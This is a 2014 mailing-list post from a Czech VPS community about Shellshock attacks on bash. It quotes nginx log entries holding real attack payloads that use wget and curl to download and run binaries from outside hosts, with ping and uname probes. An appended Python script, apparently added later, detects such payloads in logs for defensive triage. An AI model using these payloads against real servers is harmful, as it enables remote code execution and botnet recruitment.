[vpsFree.cz: community-list] Re: Attacks on bash are underway

René Klačan rene.klacan at gmail.com
Mon Sep 29 10:23:14 CEST 2014


I have the following in my logs

root at yuna /home/rene # grep '() {' /var/log/nginx/*
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O
/var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O
/var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200]
"GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74"
"shellshock-scan (
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32 +0200]
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200]
"GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo
testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200]
"GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"

it looks a bit bad :-/ ... what do you recommend doing about it? just kill
the suspicious processes? and look for any traces of whether they start up
again after a reboot?


2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik at mimik.sk>:

> the only thing you can do is check whether you have a good version of bash.
>
>
> On 29 Sep 2014, at 10:08, Jan B. Kolář <janbivoj.kolar at zazen-nudu.cz>
> wrote:
>
> > Hi,
> >
> > maybe a silly question - is there any way to tell from the log whether the
> intrusion was successful or not?
> >
> > Honza
> >
> > On 29.9.2014 10:02, Petr Krcmar wrote:
> >> On 29.9.2014 at 09:57, Jiří Medvěd wrote:
> >>> Hey,
> >>>
> >>> from another machine:
> >> Yes, I found that too. Apparently someone is trying to push a rootkit there:
> >>
> >> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
> >>
> >
> > _______________________________________________
> > Community-list mailing list
> > Community-list at lists.vpsfree.cz
> > http://lists.vpsfree.cz/listinfo/community-list
>
>
>
>
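To turn a grep like the one at the top of this message into something repeatable, here is an added example (not code from the post or from vpsFree) that parses nginx "combined" access-log lines, flags any request, referer or user-agent field starting with the Shellshock function-definition pattern `() {`, undoes nginx's `\x22` escaping so the injected command is readable, and triages each hit into a download-and-execute dropper, a ping callback probe, or a plain echo/uname probe. The sample log is constructed with documentation-range IPs and placeholder hosts; it is not the poster's data. Note that the HTTP status in these lines is what nginx served for the path and by itself says nothing about whether bash ever ran the payload; that depends on the CGI handler behind the path and the bash version, so the output below is a list of attempts to check, not a list of compromises.

```python
import re
from collections import Counter

# nginx "combined" log format, in the field order of the lines grepped above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock trigger: a bash function definition "() {" at the start of an
# attacker-controlled header value that a CGI script exports into the environment.
SHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample log (not from the post): documentation-range IPs and
# placeholder hosts, mimicking the shapes seen in the real grep output.
SAMPLE_LOG = r'''
192.0.2.10 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 198.51.100.5/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
192.0.2.10 - - [28/Sep/2014:08:18:38 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
198.51.100.20 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 198.51.100.21" "shellshock-scan (example)"
203.0.113.7 - - [28/Sep/2014:09:00:01 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''


def unescape_nginx(value):
    """Undo nginx's \\xHH escaping (it writes a literal quote as \\x22)."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})',
                  lambda m: chr(int(m.group(1), 16)), value)


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(payload):
    """Rough triage of what the injected command tries to do."""
    if re.search(r'\b(wget|curl)\b', payload):
        return "dropper"          # fetch-and-execute: treat the host as possibly compromised
    if re.search(r'\bping\b', payload):
        return "callback-probe"   # ICMP to the scanner's host would prove execution
    return "probe"                # echo / uname style checks


def scan(lines):
    """Find every request whose request, referer or user-agent carries the Shellshock pattern."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["request"].split(" ")
        path = parts[1] if len(parts) >= 2 else rec["request"]
        for field in ("referer", "agent", "request"):
            if SHOCK_RE.search(rec[field]):
                findings.append({
                    "ip": rec["ip"],
                    "time": rec["time"],
                    "path": path,
                    "status": int(rec["status"]),
                    "field": field,
                    "payload": unescape_nginx(rec[field]),
                })
    return findings


def summarize(findings):
    """Per-source-IP hit counts and how many of each payload class were seen."""
    by_ip = Counter(f["ip"] for f in findings)
    kinds = Counter(classify(f["payload"]) for f in findings)
    return {"by_ip": dict(by_ip), "kinds": dict(kinds)}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["time"]} {h["ip"]:>15} {h["path"]:<20} via {h["field"]:<7} '
              f'[{classify(h["payload"])}] {h["payload"]}')
    print(summarize(hits))
```

To run it against a real server, replace `SAMPLE_LOG.splitlines()` with the lines of `/var/log/nginx/access.log*`; the paths in the "dropper" hits are the ones whose CGI handlers deserve a look, and the wget/curl targets and ping destinations in the payloads are what to search for in outbound traffic and in `/tmp` and `/var/tmp` on the host.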

